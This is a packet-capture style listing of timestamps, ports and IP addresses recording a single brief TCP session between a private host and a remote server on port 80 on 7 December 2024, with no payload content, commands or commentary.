Dec 7, 2024 15:47:46.838433981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.838488102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.838501930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.838527918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.838542938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.839256048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.839301109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.839334011 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.839350939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.839373112 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.839390993 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.840188026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.840231895 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.840257883 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.840270042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.840297937 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.840312004 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.841156006 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.841167927 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.841192961 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.841197968 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.841213942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.841232061 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.842077971 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.842119932 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.842135906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.842148066 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.842169046 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.842187881 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.842907906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.842952013 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.843030930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.843050957 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.843070030 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.843086958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.843844891 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.843885899 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.843940973 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.843955040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.843983889 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.843997955 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.844706059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.844749928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.844774008 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.844791889 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.844805002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.844830990 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.845670938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.845712900 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.845733881 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.845746994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.845772982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.845784903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.846591949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.846635103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.846654892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.846668005 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.846688032 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.846707106 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.847578049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.847620964 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.847657919 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.847671032 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.847696066 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.847712994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.848436117 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.848479033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.848500967 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.848515987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.848532915 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.848550081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.849252939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.849293947 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.849390984 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.849409103 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.849427938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.849448919 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.850167036 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.850210905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.850248098 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.850260973 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.850286961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.850301981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.851244926 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.851284027 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.851286888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.851299047 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.851319075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.851336002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.852092028 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.852135897 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.852153063 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.852169037 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.852185965 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.852201939 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.852998972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.853039980 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.853059053 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.853072882 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.853094101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.853111029 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.854063034 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.854108095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.854121923 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.854140043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.854160070 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.854177952 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.855170012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.855190992 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.855206013 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.855212927 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.855230093 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.855248928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.855979919 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.856024981 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.856033087 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.856048107 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.856072903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.856089115 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.856760025 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.856801987 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857023001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857049942 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857064009 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857069016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857083082 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857099056 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857805014 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857844114 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857847929 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857860088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.857877016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.857893944 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.858716965 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.858740091 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.858751059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.858767033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.858781099 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.858794928 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.859879017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.859924078 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.859930992 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.859937906 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.859960079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.859981060 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.860625029 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.860675097 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.860692978 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.860703945 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.860742092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.861587048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.861604929 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.861623049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.861634016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.861660957 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.862374067 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.862394094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.862412930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.862415075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.862438917 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.862462997 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.863271952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.863332987 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.863332987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.863343954 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.863370895 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.863384962 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.864182949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.864200115 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.864228010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.864228964 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.864244938 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.864268064 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.865092039 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.865139961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.865166903 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.865179062 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.865211010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.865221977 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.865952969 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.865998983 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.866053104 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.866061926 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.866101027 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.866904020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.866971016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.866991997 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.867005110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.867039919 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.867954016 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.868000984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.868016958 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.868027925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.868062973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.868074894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:46.868758917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:46.868801117 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.028976917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029036045 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029089928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029113054 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.029148102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.029185057 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029203892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029232025 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.029258966 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.029731989 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029810905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.029823065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029836893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.029875040 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.030625105 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.030680895 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.030710936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.030724049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.030747890 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.030766010 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.031568050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.031618118 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.031646967 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.031660080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.031692982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.031716108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.032479048 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.032526016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.032557011 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.032581091 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.032598019 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.032623053 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.033354998 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.033402920 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.033438921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.033452034 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.033482075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.033493996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.034297943 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.034348011 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.034379959 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.034395933 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.034420967 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.034431934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.035196066 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.035244942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.035275936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.035289049 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.035332918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.035332918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.036171913 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.036226034 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.036247969 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.036262035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.036293030 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.036314964 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.037205935 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.037259102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.037302971 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.037316084 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.037348986 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.037364960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.037934065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.037972927 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.037981033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.037986040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.038009882 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.038023949 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.038834095 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.038878918 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.038913012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.038954020 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.038994074 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.039041996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.039725065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.039772987 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.039823055 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.039836884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.039868116 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.039884090 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.040853024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.040899038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.040936947 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.040950060 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.040980101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.040994883 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.041677952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.041727066 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.041752100 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.041765928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.041795969 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.041807890 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.042478085 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.042525053 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.042557001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.042570114 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.042603016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.042624950 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.043433905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.043481112 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.043483973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.043493986 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.043517113 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.043540001 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.044308901 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.044359922 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.044387102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.044405937 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.044425964 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.044440031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.045207977 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.045257092 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.045279026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.045295954 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.045325041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.045345068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.046209097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.046255112 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.046271086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.046288967 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.046308994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.046331882 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.047028065 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.047077894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.047106981 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.047120094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.047154903 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.047951937 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.048003912 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.048023939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.048037052 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.048068047 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.048084021 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.048858881 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.048911095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.049182892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.049230099 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.049251080 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.049263000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.049293041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.049305916 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.050055981 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.050127983 CET	49706	80	192.168.2.5	107.175.113.196
